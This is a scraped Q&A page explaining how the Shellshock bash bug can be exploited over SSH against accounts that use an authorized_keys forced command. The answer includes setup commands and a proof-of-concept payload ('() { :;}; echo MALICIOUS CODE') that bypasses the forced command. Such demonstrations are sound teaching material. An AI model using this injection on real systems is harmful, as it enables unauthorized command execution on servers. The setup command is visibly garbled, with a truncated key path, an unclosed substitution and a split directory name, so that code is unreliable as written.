Unanswered Question List.

how can shellshock be exploited over SSH?

Asked by : sprta , Date : Oct. 18, 2021, 1:22 p.m.

how can shellshock be exploited over SSH?

Answers :

One example where this can be exploited is on servers with an authorized_keys forced command. When adding an entry to ~/.ssh/authorized_keys, you can prefix the line with command="foo" to force foo to be run any time that ssh public key is used. With this exploit, if the target user's shell is set to bash, they can take advantage of the exploit to run things other than the command that they are forced to.

This would probably make more sense in example, so here is an example:

sudo useradd -d /testuser -s /bin/bash testuser sudo mkdir -p /testuser/.ssh sudo sh -c "echo command=\\\"echo starting sleep; sleep 1\\\" $(cat ~/.ssh/ > /testuser /.ssh/authorized_keys" sudo chown -R testuser /testuser

Here we set up a user testuser, that forces any ssh connections using your ssh key to run echo starting sleep; sleep 1.

We can test this with:

$ ssh [email protected] echo something else starting sleep

Notice how our echo something else doesn't get run, but the starting sleep shows that the forced command did run.

Now lets show how this exploit can be used:

$ ssh [email protected] '() { :;}; echo MALICIOUS CODE' MALICIOUS CODE starting sleep

This works because sshd sets the SSH_ORIGINAL_COMMAND environment variable to the command passed. So even though sshd ran sleep, and not the command I told it to, because of the exploit, my code still gets run.

Answered by : s4m , Date : Oct. 19, 2021, 5:17 a.m.